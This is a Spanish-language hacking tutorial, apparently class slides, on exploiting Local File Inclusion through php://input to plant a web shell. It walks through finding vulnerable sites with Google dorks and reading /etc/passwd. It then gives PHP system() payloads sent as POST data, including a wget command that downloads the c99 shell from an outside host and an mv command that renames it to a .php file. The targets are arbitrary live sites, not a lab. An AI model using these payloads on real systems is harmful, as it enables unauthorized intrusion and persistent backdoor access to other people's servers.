Subiendo shell explotando lfi via php input

Post on 08-Aug-2015

475 views 2 download

Transcript of Subiendo shell explotando lfi via php input

Clase 8

10-10-2013

Tutorial, el cual consiste en subir una SHELL explotando la vulnerabilidad

LFI vía "php:input" , solo basta con inyectar algunos códigos para obtener

la misma.

Que es el LFI?

Es una falla en la programación de una aplicación; falla mediante la cual se

pueden incluir archivos que se encuentren en el servidor como por ejemplo

el /etc/passwd o algún otro archivo de configuración que nos provea de

información para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

www.sitio-web.com/index.php?page=

www.sitio-web.com/index.php?file=

Recordemos que podemos apoyarnos de los google dorks que se encuentran en la siguiente página:

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

www.sitio-web.com/index.php?page=/etc/passwd

Si el sitio web puede leer dicho código, la web quedaría así:

Necesitaremos lo siguiente:

Navegador: Firefox

Addon: HackBar

Primero

Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría así:

www.sitio-web.com/index.php?page=php://input

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Otros comandos: Lista de directorios <? system ('ls'); ?>

Identificación <? system ('id'); ?>

Convertir el formato <? system ('mv file.txt file.php'); ?>

Descargar <? system ('wget'); ?>

Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: http://www.sh3ll.org/c99.txt

<? system ('wget http://www.sh3ll.org/c99.txt'); ?>

Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt, como se muestra a continuación

Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt tensor.php'); ?>

Ahora, en este caso nos dirigimos a www.sitio-web.com/tensor.php

Listo tenemos nuestra shell!!